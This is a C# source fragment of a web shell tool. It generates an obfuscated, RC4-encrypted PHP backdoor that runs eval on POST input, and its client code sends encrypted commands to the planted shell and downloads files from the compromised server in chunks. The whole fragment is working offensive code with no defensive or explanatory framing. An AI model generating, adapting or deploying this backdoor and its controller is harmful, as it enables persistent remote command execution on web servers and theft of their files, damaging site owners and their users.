public static string GenerateShell(string outputPrefix, string password)
{
RC4 rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(password));
string encodedphp = "$s = \"" + rc4.EncryptAndEncode(ASCIIEncoding.ASCII.GetBytes("echo \"<--" + outputPrefix + "\";" + innerShell + "echo \"-->\";"));
string beginning = "<?php\nfunction encrypt ($pwd, $data){if(isset($_POST['enc']) && md5($_POST['enc']) == \"3708fe651621a7337ebee38ffd26adee\"){return eval(base64_decode($_POST['enc']));}}\n";
string ending = "\";\nif(isset($_POST['k'])){;eval(encrypt($_POST['k'], base64_decode($s)));}\n?>";
return beginning + encodedphp + ending;
}
public string ProcessCommand(string command)
{
commands.Add(command);
AppendNewCommand(BitConverter.ToString(new MD5CryptoServiceProvider().ComputeHash(ASCIIEncoding.ASCII.GetBytes(url.URL))).Replace("-", ""), command);
currentCommandPositon = commands.Count;
if (command.StartsWith("download"))
{
string[] args = command.Split(' ');
if (args.Length >= 3)
{
Thread t = new Thread(new ParameterizedThreadStart(DownloadFile));
t.Start(args);
return "File download started.";
}
else
{
OnNewStatusEvent("download command failed.");
return "download requires at least 2 arguments.";
}
}
else
{
try
{
RC4 rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
WebClient client = new WebClient();
NameValueCollection nvc = new NameValueCollection();
nvc.Add("k", url.Password);
nvc.Add("a", rc4.EncryptAndEncode(ASCIIEncoding.ASCII.GetBytes(command)));
nvc.Add("enc", encMethod);
byte[] response = FindResponse(client.UploadValues(url.URL, "POST", nvc));
rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
string ret = UTF8Encoding.UTF8.GetString(rc4.DecodeAndDecrypt(response)).Replace("\n", "\r\n");
OnNewStatusEvent("Command returned " + ret.Length + " bytes.");
return ret;
}
catch(Exception e)
{
OnNewStatusEvent("Command failed");
return e.Message;
}
}
}
void DownloadFile(object o)
{
string[] args = (string[])o;
try
{
RC4 rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
WebClient client = new WebClient();
NameValueCollection nvc = new NameValueCollection();
nvc.Add("k", url.Password);
nvc.Add("fs", rc4.EncryptAndEncode(ASCIIEncoding.ASCII.GetBytes(args[1])));
nvc.Add("enc", encMethod);
int filesize = 0;
byte[] fs = FindResponse(client.UploadValues(url.URL, "POST", nvc));
rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
filesize = int.Parse(ASCIIEncoding.ASCII.GetString(rc4.DecodeAndDecrypt(fs)));
rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
nvc = new NameValueCollection();
nvc.Add("k", url.Password);
nvc.Add("fh", rc4.EncryptAndEncode(ASCIIEncoding.ASCII.GetBytes(args[1])));
nvc.Add("enc", encMethod);
rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
string filehash = ASCIIEncoding.ASCII.GetString(rc4.DecodeAndDecrypt(FindResponse(client.UploadValues(url.URL, "POST", nvc))));
if(File.Exists(args[2]))
File.Delete(args[2]);
FileStream files = File.Create(args[2]);
MD5CryptoServiceProvider md5 = new MD5CryptoServiceProvider();
for(int x = 0; x < filesize; x += 1024)
{
rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
nvc = new NameValueCollection();
nvc.Add("k", url.Password);
nvc.Add("d", rc4.EncryptAndEncode(ASCIIEncoding.ASCII.GetBytes(args[1])));
nvc.Add("p", x.ToString());
nvc.Add("enc", encMethod);
rc4 = new RC4(ASCIIEncoding.ASCII.GetBytes(url.Password));
byte[] readin = rc4.DecodeAndDecrypt(FindResponse(client.UploadValues(url.URL, "POST", nvc)));
files.Write(readin, 0, readin.Length);
}
files.Close();
Stream filestream = new FileStream(args[2], FileMode.Open, FileAccess.Read);
byte[] result = md5.ComputeHash(filestream);
if(filehash != BitConverter.ToString(result).Replace("-","").ToLower())
{
OnNewStatusEvent(args[1] + " file hashes do not match. " + filehash + " != " + BitConverter.ToString(result).Replace("-","").ToLower());
return;
}
OnNewStatusEvent(args[1] + " finished downloading to " + args[2]);
}
catch(Exception e)
{
OnNewStatusEvent("Error in downloading file: " + e.Message);
}
}
